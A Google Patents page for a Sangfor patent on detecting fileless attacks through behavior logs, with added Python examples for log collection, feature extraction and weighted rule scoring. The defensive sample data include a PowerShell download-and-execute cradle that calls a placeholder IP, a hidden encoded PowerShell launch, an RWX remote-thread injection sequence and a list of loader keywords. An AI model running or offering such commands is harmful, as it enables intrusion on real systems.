CN113886814A - Attack detection method and related device - Google Patents

Attack detection method and related device

Info

Publication number
CN113886814A
CN113886814A (application CN202111152699.XA)
Authority
CN
China
Prior art keywords
behavior
attack
log
file
matching
Prior art date
Legal status
Pending
Application number
CN202111152699.XA
Other languages
Chinese (zh)
Inventor
叶昌健
Current Assignee
Sangfor Technologies Co Ltd
Original Assignee
Sangfor Technologies Co Ltd
Priority date
Filing date
Publication date

Classifications

    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50 Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55 Detecting local intrusion or implementing counter-measures

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Software Systems (AREA)
  • Theoretical Computer Science (AREA)
  • Computer Hardware Design (AREA)
  • Physics & Mathematics (AREA)
  • General Engineering & Computer Science (AREA)
  • General Physics & Mathematics (AREA)
  • Debugging And Monitoring (AREA)
  • Computer And Data Communications (AREA)

Abstract

The application discloses an attack detection method comprising the following steps: acquiring a behavior log, where the behavior log comprises one or more of system behavior information, process behavior information, script behavior information and framework behavior information; performing feature extraction on the behavior log to obtain behavior features, where the behavior features comprise one or more of memory buffer features, execution context features, process dump file features and abnormal payload features; and performing attack detection based on the behavior features to obtain a detection result. Because detection is carried out on a variety of behavior logs and behavior features rather than on static files alone, the range of attack detection is widened and the detection effect is improved, in particular for fileless attacks that leave no file on disk for a static scanner to inspect. The application also discloses an attack detection apparatus, a server and a computer-readable storage medium having the same beneficial effects.

Description

Attack detection method and related device
Technical Field
The present application relates to the field of computer security, and in particular to an attack detection method, an attack detection apparatus, a server and a computer-readable storage medium.
Background
With the continuing development of information technology, information security has become increasingly important across industries. When an information system is built or a new technology is adopted, the security solution to be used must therefore be considered from the outset.
In the related art, file-based static scanning inspects files for dangerous content and removes the threat, which addresses file-based security problems. Such a solution, however, has great difficulty detecting a fileless attack, in which the attacker's code never lands on disk as a scannable file. Attackers increasingly use fileless techniques to bypass security solutions, so that fileless malware intrusions are hard to detect and the overall attack detection effect is reduced.
How to improve the detection of such attacks is therefore a key issue for those skilled in the art.
Disclosure of Invention
The purpose of the present application is to provide an attack detection method, an attack detection apparatus, a server and a computer-readable storage medium, so as to improve the attack detection effect and maintain the security and reliability of a system.
To solve the above technical problem, the present application provides an attack detection method, including:
acquiring a behavior log; the behavior log comprises one or more of system behavior information, process behavior information, script behavior information and framework behavior information;
performing feature extraction on the behavior log to obtain behavior features; the behavior features comprise one or more of memory buffer features, execution context features, process dump file features and abnormal payload features;
and performing attack detection based on the behavior features to obtain a detection result.
Optionally, acquiring the behavior log includes:
acquiring the behavior log through a system monitoring tool and/or an interface (API) hook and/or an anti-malware scanning interface.
Optionally, performing attack detection based on the behavior features to obtain a detection result includes:
matching the behavior features against a plurality of fileless-attack matching rules to obtain a matching result;
and calculating an attack score from the matching result to obtain the detection result.
Optionally, matching the behavior features against a plurality of fileless-attack matching rules to obtain a matching result includes:
setting up an independent subprocess for each fileless-attack matching rule; each subprocess corresponds to one fileless attack technique, and each subprocess is assigned its own weight;
performing fileless-attack matching on the behavior features in each subprocess to obtain the matching result;
correspondingly, calculating the attack score from the matching result to obtain the detection result includes:
calculating the attack score from the matching result based on the weight of each subprocess to obtain the detection result.
Optionally, the method further includes:
extracting the matched rules and matched features from the matching result;
determining a risk level from the score of the detection result;
and generating an analysis summary from the matched rules, the matched features and the risk level.
Optionally, the method further includes:
handling the detected attack based on the detection result.
Optionally, the method further includes:
aggregating suspicious logs based on the detection result to obtain a suspicious behavior log;
and displaying the suspicious logs through a visual management platform.
The present application further provides an attack detection apparatus, including:
a behavior log acquisition module for acquiring a behavior log; the behavior log comprises one or more of system behavior information, process behavior information, script behavior information and framework behavior information;
a behavior feature extraction module for performing feature extraction on the behavior log to obtain behavior features; the behavior features comprise one or more of memory buffer features, execution context features, process dump file features and abnormal payload features;
and a fileless-attack detection module for performing attack detection based on the behavior features to obtain a detection result.
The present application further provides a server, comprising:
a memory for storing a computer program;
and a processor for implementing the steps of the attack detection method described above when executing the computer program.
The present application also provides a computer-readable storage medium storing a computer program which, when executed by a processor, implements the steps of the attack detection method described above.
In the attack detection method provided by the application, a behavior log is acquired, feature extraction is performed on the behavior log to obtain behavior features, and attack detection is performed on the behavior features to obtain a detection result. Because the behavior log comprises one or more of system behavior information, process behavior information, script behavior information and framework behavior information, and the behavior features comprise one or more of memory buffer features, execution context features, process dump file features and abnormal payload features, detection covers a variety of behavior logs and behavior features instead of static files alone; the range of attack detection is widened and the detection effect is improved.
The attack detection apparatus, server and computer-readable storage medium further provided by the present application have the same beneficial effects, which are not repeated here.
Drawings
The drawings needed for the description of the embodiments are briefly introduced below. They illustrate embodiments of the present application; those skilled in the art can derive other drawings from them without creative effort.
Fig. 1 is a flowchart of an attack detection method provided in an embodiment of the present application;
Fig. 2 is a flowchart of another attack detection method provided in an embodiment of the present application;
Fig. 3 is a schematic structural diagram of an attack detection apparatus according to an embodiment of the present application.
Detailed Description
The core of the application is to provide an attack detection method, an attack detection apparatus, a server and a computer-readable storage medium, so as to improve the attack detection effect and maintain the security and reliability of a system.
To make the objects, technical solutions and advantages of the embodiments clearer, the technical solutions are described below with reference to the drawings. The described embodiments are some, not all, of the embodiments of the present application; all other embodiments that a person skilled in the art can derive from them without creative effort fall within the scope of protection of the present application.
In the related art, file-based static scanning inspects files for dangerous content and removes the threat, which addresses file-based security problems, but it has great difficulty detecting a fileless attack. Attackers increasingly use fileless techniques to bypass security solutions, so that fileless malware intrusions are hard to detect and the attack detection effect is reduced.
The attack detection method provided by the application therefore acquires a behavior log, extracts features from it to obtain behavior features, and performs attack detection on the behavior features to obtain a detection result. The behavior log comprises one or more of system behavior information, process behavior information, script behavior information and framework behavior information, and the behavior features comprise one or more of memory buffer features, execution context features, process dump file features and abnormal payload features. Detection is thus performed on a variety of behavior logs and behavior features instead of on static files alone, the range of attack detection is widened, and the detection effect is improved.
An attack detection method provided by the present application is described below by way of an embodiment.
Referring to Fig. 1, Fig. 1 is a flowchart of an attack detection method according to an embodiment of the present application.
In this embodiment, the method may include:
S101, acquiring a behavior log; the behavior log comprises one or more of system behavior information, process behavior information, script behavior information and framework behavior information;
This step describes how the behavior log is collected. Any one of the system behavior information, process behavior information, script behavior information and framework behavior information may be acquired, or all four may be acquired. Whichever is acquired, the data relevant to detection is no longer collected from static files alone; the range of data available for detection, and with it the range of attack detection, is enlarged.
The system behavior information is the behavior log of the system and its processes, acquired at the operating-system level;
the process behavior information is the behavior log related to a process, acquired at the process level;
the script behavior information is the behavior log related to scripts, acquired at the script execution level;
the framework behavior information is the behavior log related to framework operations, acquired at the runtime framework level.
Further, when the behavior log includes system behavior information, acquiring the behavior log may include:
Step 1, recording the system behavior of processes, the registry and the network with a system monitoring tool to obtain the system behavior information;
Step 2, taking the system behavior information as the behavior log.
This alternative collects the behavior log through the operating-system path: the system monitoring tool records the process, registry and network behavior of the system, and the resulting system behavior information is used as the behavior log. Collecting at the system level improves the accuracy and reliability of the behavior log, and system behaviors can be judged from the system level even when no file is involved, so fileless behaviors can be judged and detected.
The system monitoring tool may be a system monitor and a process monitor supplied with the platform (on Windows, for instance, Sysmon and Process Monitor).
Further, when the behavior log includes process behavior information, acquiring the behavior log includes:
Step 1, monitoring the interface (API) calls of each process through an interface hook to obtain the process behavior information;
Step 2, taking the process behavior information as the behavior log.
This alternative collects the behavior log through the process path: a hook placed on the interfaces called by each process records the calling behavior, which becomes the process behavior information and then the behavior log. Because the log is collected per process, an attack carried out by injecting a fileless payload into a target process is not missed.
Further, this alternative may be based on a lightweight process-injection monitor. The program starts automatically at boot, is injected into each newly created process of the system, monitors the calls to sensitive APIs at API granularity by means of API (Application Programming Interface) hooking, and records the call chain, call parameters and return value of each API call.
Further, when the behavior log includes script behavior information and framework behavior information, acquiring the behavior log includes:
Step 1, intercepting and recording, through the anti-malware scanning interface, the scripts that are invoked and the modules executed by the framework, to obtain the script behavior information and the framework behavior information;
Step 2, taking this dynamic behavior log as the behavior log.
This alternative collects the behavior log through the script and framework path of a process: the anti-malware scanning interface intercepts and records the invoked scripts and the framework-executed modules, and the resulting dynamic behavior log is used as the behavior log.
In this alternative, the monitor may be built on the Windows AMSI (Antimalware Scan Interface). Detection through AMSI is aimed at script-based and .NET Framework-based attacks, covering two sub-categories of fileless attack. That is, the script behavior information and framework behavior information can be obtained through an interface the operating system already provides and used as the behavior log. AMSI hands the scanner the content a script host is about to execute, after any obfuscation layers have been unwrapped, which is why it captures what a static scan of the file cannot. Note that the API hook and the AMSI provider both run inside the monitored process, so a payload that gains code execution there can tamper with them; the system-level monitor is the collection path that does not share the attacker's address space, and the three paths are therefore complementary rather than interchangeable.
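The three collection paths of S101 produce records in different shapes. The following is an added example, not code from the patent, that normalizes one record of each kind into a single behavior-log schema. All input records are constructed: the text mimics the multi-line message body of a Sysmon "Process Create" event; the hook record is the JSON a hypothetical API-hook monitor (name, fields and call-chain format are assumptions) might emit; and the two AMSI records carry the fields an AMSI provider receives (app name, content name, content). The AMSI app-name prefixes used to tell script hosts from the .NET runtime are also assumptions.

```python
"""Collect and normalize behavior records from the three collection paths.

Added illustration, not code from the patent. The three input records below are
constructed: (a) the multi-line message body of a Sysmon "Process Create"
event, (b) a JSON record of the kind a hypothetical API-hook monitor would emit
(call chain, parameters, return value), and (c) two JSON records with the
fields an AMSI provider receives (app name, content name, content).
"""
import base64
import json
from dataclasses import dataclass, field
from typing import Any

# Assumption: script hosts identify themselves to AMSI with these app-name
# prefixes, and the .NET runtime uses "DotNet" when scanning loaded assemblies.
SCRIPT_HOST_PREFIXES = ("PowerShell", "JScript", "VBScript", "WSH", "Office")
FRAMEWORK_PREFIXES = ("DotNet",)


@dataclass
class BehaviorEvent:
    source: str                     # system | process | script | framework
    pid: int
    kind: str                       # ProcessCreate, ApiCall, AmsiScan, ...
    fields: dict[str, Any] = field(default_factory=dict)


def parse_sysmon_message(text: str) -> BehaviorEvent:
    """Parse the 'Key: value' lines of a Sysmon event message into fields."""
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    kind = lines[0].rstrip(":").replace(" ", "")   # "Process Create:" -> ProcessCreate
    fields: dict[str, str] = {}
    for ln in lines[1:]:
        key, sep, value = ln.partition(":")        # split on the first colon only,
        if sep:                                    # so values such as C:\... survive
            fields[key.strip()] = value.strip()
    return BehaviorEvent("system", int(fields.get("ProcessId", 0)), kind, fields)


def parse_hook_record(line: str) -> BehaviorEvent:
    """Validate a JSON record from the API-hook monitor (process-level path)."""
    rec = json.loads(line)
    missing = [k for k in ("pid", "api", "args", "ret", "callchain") if k not in rec]
    if missing:
        raise ValueError(f"hook record missing {missing}")
    return BehaviorEvent("process", int(rec["pid"]), "ApiCall", rec)


def parse_amsi_record(line: str) -> BehaviorEvent:
    """Classify an AMSI scan request as script or framework behavior by app name."""
    rec = json.loads(line)
    app = rec["app_name"]
    source = "framework" if app.startswith(FRAMEWORK_PREFIXES) else "script"
    if source == "script" and not app.startswith(SCRIPT_HOST_PREFIXES):
        rec["unknown_host"] = True      # keep the record, flag it for the analyst
    return BehaviorEvent(source, int(rec["pid"]), "AmsiScan", rec)


# --- constructed sample records ---------------------------------------------
SYSMON_PROCESS_CREATE = """Process Create:
RuleName: -
UtcTime: 2021-09-29 10:15:30.123
ProcessId: 4312
Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
CommandLine: powershell.exe -nop -w hidden -enc SQBFAFgA
User: DESKTOP-1\\alice
IntegrityLevel: Medium
ParentProcessId: 2088
ParentImage: C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE
"""

HOOK_RECORD = json.dumps({
    "pid": 4312, "api": "VirtualAlloc",
    "args": {"lpAddress": 0, "dwSize": 4096, "flAllocationType": 0x3000, "flProtect": 0x40},
    "ret": 0x1A3F0000,
    "callchain": ["powershell.exe+0x1c2a", "clr.dll+0x2f10", "kernel32.dll!VirtualAlloc"],
})

AMSI_SCRIPT = json.dumps({
    "pid": 4312,
    "app_name": "PowerShell_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe_10.0.19041.1",
    "content_name": "",
    "content": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')",
})

AMSI_ASSEMBLY = json.dumps({
    "pid": 4312, "app_name": "DotNet", "content_name": "",
    "content": base64.b64encode(b"MZ\x90\x00\x03\x00\x00\x00").decode(),  # stand-in for assembly bytes
})


def collect_behavior_log() -> list[BehaviorEvent]:
    """Run every collection path and return one unified behavior log."""
    return [
        parse_sysmon_message(SYSMON_PROCESS_CREATE),
        parse_hook_record(HOOK_RECORD),
        parse_amsi_record(AMSI_SCRIPT),
        parse_amsi_record(AMSI_ASSEMBLY),
    ]


if __name__ == "__main__":
    for ev in collect_behavior_log():
        print(ev.source, ev.pid, ev.kind, sorted(ev.fields)[:4])
```

The unified record keeps the process id from every path so that later steps can join a process-creation event, the API calls made by that process and the script content it executed into one execution context.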
S102, performing feature extraction on the behavior log to obtain behavior features; the behavior features comprise one or more of memory buffer features, execution context features, process dump file features and abnormal payload features;
On the basis of S101, this step extracts features from the acquired behavior log, so that the redundancy in the raw log does not degrade attack detection and the detection precision and accuracy are improved. The behavior features comprise one or more of memory buffer features, execution context features, process dump file features and abnormal payload features.
The feature extraction method may be any one provided in the prior art, or may be chosen according to the detection angle and detection type, or according to patterns in the behavior log; it is not specifically limited here.
Further, the feature extraction manner may be determined by the detection purpose, so that the feature data needed by the detection step is taken from the behavior log and redundant, useless behavior data is removed. For example, to detect network attacks, the network-related data in the behavior log is extracted as the behavior features; to detect system attacks, the log data related to system calls or system operations; to detect data attacks, the log data related to data operations and database operations. When more than one extraction manner fits a detection purpose, a suitable one can be chosen according to the specific requirement; this is not specifically limited here.
Further, the feature extraction manner may be determined by the attack mode of the security attack, so that extraction and detection are targeted at that mode. If the attack mode is a fileless attack, the memory buffer, execution context, process dump file and suspicious payload data in the behavior log are taken as the extracted behavior features, and the fileless behavior is determined from those data or their acquisition paths, without attention to log data unrelated to fileless attacks.
Further, the feature extraction manner may be determined by patterns or anomalies appearing in the behavior log. Operating patterns include, without limitation, system-level operations or access to a specific network in a specific time period, regular network access or data saving after a certain operation, and a data save following a data read or write. An anomaly is an operation that appears suddenly in a process or program that has otherwise run according to a regular pattern: for example, an object that regularly reads and writes local data suddenly connects to an external network and transmits data.
Based on the above, the feature extraction operation in this step is not unique; different manners may be chosen in different situations, and several manners may be combined; this is not specifically limited here.
Further, to improve the effect of feature extraction and obtain behavior features that better match fileless attacks, the step may include:
Step 1, parsing the behavior log according to the log format of that log to obtain log data;
Step 2, extracting features from the log data based on intrusion target features to obtain the behavior features.
This alternative describes how feature extraction is performed: the behavior log is parsed according to its own format to obtain log data, and features are extracted from the log data based on the intrusion target features; the intrusion target features comprise one or more of memory buffer features, execution context features, process dump file features and abnormal payload features. The intrusion target feature can be understood as the path feature of a fileless attack: a fileless attack usually intrudes through the memory buffer, the execution context, the process dump file or an abnormal payload and then carries out its attack operation.
For other attack types, feature extraction may likewise use the attack path specific to that type; this is not specifically limited here.
Extracting features from the memory buffer, execution context, process dump file and abnormal payload yields behavior features that match fileless attack characteristics more closely, improves the effectiveness and precision of feature extraction, and effectively isolates the feature data relevant to fileless attacks.
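The feature-extraction step of S102, as an added example that is not the patent's code: it takes an already-normalized behavior log and produces the four fileless-attack feature groups the text names (memory buffer, execution context, process dump file, abnormal payload). The event shape, the dump-region metadata, the list of memory-management APIs, the suspicious-token list and the entropy threshold are assumptions, and the sample events are constructed; the -EncodedCommand decoding and the RWX page-protection constant are real Windows details.

```python
"""Extract the four fileless-attack feature groups from a normalized behavior log.

Added illustration, not the patent's code. Input is a list of already
normalized events (constructed below); the event shape, the dump-region
metadata, the API list and the entropy threshold are assumptions.
"""
import base64
import math
import re
from collections import Counter
from typing import Any, Optional

PAGE_EXECUTE_READWRITE = 0x40
MEMORY_APIS = {"VirtualAlloc", "VirtualAllocEx", "WriteProcessMemory",
               "CreateRemoteThread", "NtMapViewOfSection"}
SUSPICIOUS_TOKENS = re.compile(
    r"\b(IEX|Invoke-Expression|FromBase64String|Reflection\.Assembly|DownloadString)\b", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
ENTROPY_THRESHOLD = 5.0     # assumption: bits/byte above which text looks packed or encoded


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    counts = Counter(data)
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts.values())


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell -EncodedCommand carries base64 of UTF-16LE script text."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def payload_feature(pid: int, origin: str, content: str) -> Optional[dict[str, Any]]:
    """An abnormal-payload feature: URLs, loader tokens or high entropy in executed content."""
    urls = re.findall(r"https?://[^\s'\"]+", content)
    entropy = shannon_entropy(content.encode())
    tokens = SUSPICIOUS_TOKENS.findall(content)
    if not (urls or tokens or entropy > ENTROPY_THRESHOLD):
        return None
    return {"pid": pid, "origin": origin, "urls": urls, "tokens": tokens,
            "entropy": round(entropy, 2), "content": content}


def extract_features(events: list[dict[str, Any]]) -> dict[str, list[dict[str, Any]]]:
    feats: dict[str, list[dict[str, Any]]] = {
        "memory_buffer": [], "execution_context": [], "process_dump": [], "abnormal_payload": []}
    for ev in events:
        pid, kind, f = ev["pid"], ev["kind"], ev["fields"]
        if kind == "ApiCall" and f["api"] in MEMORY_APIS:
            args = f.get("args", {})
            feats["memory_buffer"].append({
                "pid": pid, "api": f["api"],
                "rwx": args.get("flProtect") == PAGE_EXECUTE_READWRITE,
                "target_pid": args.get("target_pid", pid)})
        elif kind == "ProcessCreate":
            feats["execution_context"].append({
                "pid": pid, "image": basename(f["Image"]), "parent": basename(f["ParentImage"]),
                "user": f.get("User"), "integrity": f.get("IntegrityLevel")})
            decoded = decode_encoded_command(f.get("CommandLine", ""))
            if decoded and (p := payload_feature(pid, "CommandLine", decoded)):
                feats["abnormal_payload"].append(p)
        elif kind == "AmsiScan":
            if p := payload_feature(pid, f["app_name"].split("_")[0], f["content"]):
                feats["abnormal_payload"].append(p)
        elif kind == "ProcessDump":
            # assumption: dump metadata lists regions with protection and backing module
            for r in f["regions"]:
                if r["protect"] == PAGE_EXECUTE_READWRITE and r.get("module") is None:
                    feats["process_dump"].append({"pid": pid, "base": r["base"], "size": r["size"]})
    return feats


# --- constructed sample input -----------------------------------------------
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
ENC = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"pid": 4312, "kind": "ProcessCreate", "fields": {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": f"powershell.exe -nop -w hidden -enc {ENC}",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "User": r"DESKTOP-1\alice", "IntegrityLevel": "Medium"}},
    {"pid": 4312, "kind": "ApiCall", "fields": {"api": "VirtualAlloc",
        "args": {"dwSize": 4096, "flProtect": 0x40}, "ret": 0x1A3F0000}},
    {"pid": 4312, "kind": "ApiCall", "fields": {"api": "CreateRemoteThread",
        "args": {"target_pid": 1188, "lpStartAddress": 0x1A3F0000}, "ret": 0x2C4}},
    {"pid": 4312, "kind": "AmsiScan", "fields": {
        "app_name": "PowerShell_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe_10.0.19041.1",
        "content": SCRIPT}},
    {"pid": 1188, "kind": "ProcessDump", "fields": {"regions": [
        {"base": 0x7FF600000000, "size": 0x20000, "protect": 0x20, "module": "notepad.exe"},
        {"base": 0x1A3F0000, "size": 0x1000, "protect": 0x40, "module": None}]}},
]

if __name__ == "__main__":
    for group, items in extract_features(SAMPLE_EVENTS).items():
        print(f"{group}: {len(items)}")
```

Everything not in one of the four groups is dropped, which is the redundancy reduction the step describes; the decoded command line and the AMSI content are kept verbatim inside the payload feature because the matching rules of S103 and the analysis summary both need the original text.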
S103, performing attack detection based on the behavior features to obtain a detection result.
On the basis of S102, this step performs attack detection on the behavior features and obtains a detection result. Once the behavior features have been acquired, detection may be based on attack matching rules, on a machine learning model, or on a behavior baseline.
Because the behavior features are extracted from the acquired behavior log, they reflect the behavior at the system, process, script or framework level, and detection is decoupled from files: it operates on the feature layer of the fileless attack rather than on a file.
The detection method is not unique and may be chosen according to the specific attack situation; it is not limited here. Further, the detection mode may be selected by attack mode, determined by the detection library used in the detection process, or determined by the behavior features.
Further, to improve detection efficiency and reduce detection latency, the step may include:
Step 1, matching the behavior features against a plurality of fileless-attack matching rules to obtain a matching result;
Step 2, calculating an attack score from the matching result to obtain the detection result.
This alternative describes how detection is performed: the behavior features are matched against a plurality of fileless-attack matching rules to obtain a matching result, and an attack score is calculated from the matching result to obtain the detection result. The dimensions covered by the matching rules include, without limitation, process, scheduled task, system service, network, registry, file, WMI (Windows Management Instrumentation) and memory. The matching result includes, without limitation, the number of rules matched, the type of each matched rule and the scope of each matched rule. From these data a weighted sum or a weighted average is computed to obtain the detection result. When the attack score exceeds the attack threshold, an attack is judged to have occurred; when it lies within an intermediate range, a risk is judged to exist; and when it is below the safety threshold, the behavior is judged safe.
Further, to increase matching efficiency and the accuracy of the matching result, the above alternative may include:
Step 1, setting up an independent subprocess for each fileless-attack matching rule; each subprocess corresponds to one fileless attack technique and is assigned its own weight;
Step 2, performing fileless-attack matching on the behavior features in each subprocess to obtain the matching result;
Step 3, calculating the attack score from the matching result based on the weight of each subprocess to obtain the detection result.
This alternative describes another way of obtaining the detection result: an independent subprocess is set up for each fileless-attack matching rule, each subprocess corresponds to one fileless attack technique and carries its own weight, fileless-attack matching is performed on the behavior features in each subprocess to obtain the matching result, and the attack score is calculated from the matching result using the weight of each subprocess. Running each rule in its own independent subprocess lets the rules execute in parallel, which improves rule-matching efficiency and reduces the latency of the matching process, and a rule that is slow or faults does not stall the others.
Further, to improve the technician's experience in viewing the matching result and the efficiency of information display, this embodiment may further include:
Step 1, extracting the matched rules and matched features from the matching result;
Step 2, determining the risk level from the score of the detection result;
Step 3, generating an analysis summary from the matched rules, the matched features and the risk level.
This alternative describes how the analysis summary is obtained: the matched rules and matched features are extracted from the matching result, the risk level is determined from the score of the detection result, and the summary is generated from the matched rules, the matched features and the risk level.
The analysis summary shows the matched rules and matched features prominently, together with the current risk level, so that the risk information is displayed intuitively.
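The rule matching, weighted scoring, risk-level mapping and summary generation of S103 together, as an added example that is not the patent's code. The rule names and weights, the two thresholds, the feature layout and the sample features are assumptions; the patent gives each rule its own subprocess, while this example gives each rule its own worker thread (a ProcessPoolExecutor with module-level rule functions gives the process isolation the text describes). The score is the share of total rule weight matched, scaled to 0..100, which is the weighted-average variant the text allows.

```python
"""Rule matching with per-rule workers, weighted scoring, risk level and summary.

Added illustration, not the patent's code. Rule names, weights, thresholds and
the feature layout are assumptions; the patent runs each rule in its own
subprocess, this example uses one thread per rule.
"""
from concurrent.futures import ThreadPoolExecutor
from dataclasses import dataclass
from typing import Any, Callable

Features = dict[str, list[dict[str, Any]]]
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str                           # the fileless technique the rule covers
    weight: float
    match: Callable[[Features], list[str]]   # returns descriptions of matched features


def office_spawns_script_host(feats: Features) -> list[str]:
    return [f"{e['parent']} -> {e['image']} (pid {e['pid']})"
            for e in feats["execution_context"] if e["parent"] in OFFICE and e["image"] in SCRIPT_HOSTS]


def download_or_encoded_payload(feats: Features) -> list[str]:
    return [f"{p['origin']}: urls={p['urls']} tokens={p['tokens']}"
            for p in feats["abnormal_payload"] if p["urls"] or p["tokens"]]


def rwx_alloc_then_remote_thread(feats: Features) -> list[str]:
    rwx_pids = {m["pid"] for m in feats["memory_buffer"] if m["rwx"]}
    return [f"pid {m['pid']} RWX alloc then CreateRemoteThread into pid {m['target_pid']}"
            for m in feats["memory_buffer"]
            if m["api"] == "CreateRemoteThread" and m["pid"] in rwx_pids]


def unbacked_rwx_region_in_dump(feats: Features) -> list[str]:
    return [f"pid {r['pid']} unbacked RWX region at {r['base']:#x} ({r['size']:#x} bytes)"
            for r in feats["process_dump"]]


def wmi_spawns_script_host(feats: Features) -> list[str]:
    return [f"wmiprvse.exe -> {e['image']} (pid {e['pid']})"
            for e in feats["execution_context"]
            if e["parent"] == "wmiprvse.exe" and e["image"] in SCRIPT_HOSTS]


RULES = [
    Rule("office_spawns_script_host", "macro/DDE to script host", 20, office_spawns_script_host),
    Rule("download_or_encoded_payload", "in-memory script download/decode", 25, download_or_encoded_payload),
    Rule("rwx_alloc_then_remote_thread", "process injection", 30, rwx_alloc_then_remote_thread),
    Rule("unbacked_rwx_region_in_dump", "reflective code in memory", 15, unbacked_rwx_region_in_dump),
    Rule("wmi_spawns_script_host", "WMI remote execution", 10, wmi_spawns_script_host),
]
ATTACK_THRESHOLD, RISK_THRESHOLD = 60.0, 25.0   # assumption


def run_rules(feats: Features, rules=RULES) -> list[tuple[Rule, list[str]]]:
    """Evaluate every rule in its own worker; keep only the rules that matched."""
    with ThreadPoolExecutor(max_workers=len(rules)) as pool:
        results = pool.map(lambda r: (r, r.match(feats)), rules)
        return [(r, hits) for r, hits in results if hits]


def attack_score(matches, rules=RULES) -> float:
    """Share of total rule weight that matched, scaled to 0..100."""
    total = sum(r.weight for r in rules)
    return round(100.0 * sum(r.weight for r, _ in matches) / total, 1)


def risk_level(score: float) -> str:
    if score >= ATTACK_THRESHOLD:
        return "attack"
    return "risk" if score >= RISK_THRESHOLD else "safe"


def analysis_summary(feats: Features) -> dict[str, Any]:
    """Detection result plus the analysis summary: matched rules, features, level."""
    matches = run_rules(feats)
    score = attack_score(matches)
    return {
        "score": score,
        "level": risk_level(score),
        "matched_rules": [r.name for r, _ in matches],
        "techniques": [r.technique for r, _ in matches],
        "matched_features": [hit for _, hits in matches for hit in hits],
    }


# --- constructed sample features -------------------------------------------
SUSPICIOUS: Features = {
    "execution_context": [{"pid": 4312, "image": "powershell.exe", "parent": "winword.exe"}],
    "abnormal_payload": [{"pid": 4312, "origin": "CommandLine",
                          "urls": ["http://198.51.100.7/a"], "tokens": ["IEX"]}],
    "memory_buffer": [{"pid": 4312, "api": "VirtualAlloc", "rwx": True, "target_pid": 4312},
                      {"pid": 4312, "api": "CreateRemoteThread", "rwx": False, "target_pid": 1188}],
    "process_dump": [{"pid": 1188, "base": 0x1A3F0000, "size": 0x1000}],
}
BENIGN: Features = {
    "execution_context": [{"pid": 900, "image": "notepad.exe", "parent": "explorer.exe"}],
    "abnormal_payload": [], "memory_buffer": [], "process_dump": [],
}

if __name__ == "__main__":
    for name, feats in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, analysis_summary(feats))
```

Each rule returns the concrete features it matched rather than a boolean, so the summary can list the parent/child chain, the decoded payload origin and the injected target pid without re-running the rules; the weights are what make one injection rule outweigh several weak context rules when the score is formed.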
Further, the technical solution of this embodiment may further include:
and carrying out abnormal attack processing based on the detection result.
Therefore, the alternative scheme mainly explains that abnormal attack processing can be performed on the detection result, namely, processing is performed according to the detection result, and larger influence caused by file-free attack is avoided. The adopted abnormal attack processing may adopt any one of processing modes provided by the prior art, and is not specifically limited herein.
Further, the technical solution of this embodiment may further include:
step 1, performing suspicious log summarizing based on the detection result to obtain a suspicious behavior log;
step 2, displaying the suspicious log through a visual management platform.
In this alternative the suspicious behavior log is displayed at the end of the detection process, so that technicians can conveniently consult and manage the detection result. The suspicious logs are summarized based on the detection results to obtain the suspicious behavior log, and the suspicious log is displayed through the visual management platform.
In addition, to improve the efficiency of attack detection, this embodiment may also be provided in the form of a client and a server. Behavior log collection is executed on the client, while feature extraction and attack detection can be executed on the server. This split-execution communication mode improves detection efficiency and avoids occupying excessive performance resources on the client.
In summary, in this embodiment, a behavior log is obtained, feature extraction is performed on the behavior log to obtain a behavior feature, and finally attack detection is performed on the behavior feature to obtain a detection result, where the behavior log includes one or a combination of multiple types of system behavior information, process behavior information, script behavior information, and frame behavior information, and the behavior feature includes one or a combination of multiple types of memory buffer feature, execution context feature, process dump file feature, and abnormal load feature, so that attack detection is performed on multiple different behavior logs and different behavior features, instead of performing attack detection only on a static file, an attack detection range is increased, and an attack detection effect is improved.
Furthermore, in a more practical application environment, file-free attacks need to be detected effectively, with improved detection efficiency and reduced detection delay. The attack detection method provided by the present application is further described below through a specific embodiment.
Referring to fig. 2, fig. 2 is a flowchart of another attack detection method according to an embodiment of the present application.
In this embodiment, the attack detection process is split between execution on the client and execution on the master control end (the server). Behavior logs are collected on the client, while feature extraction from the behavior logs and attack detection are performed on the server.
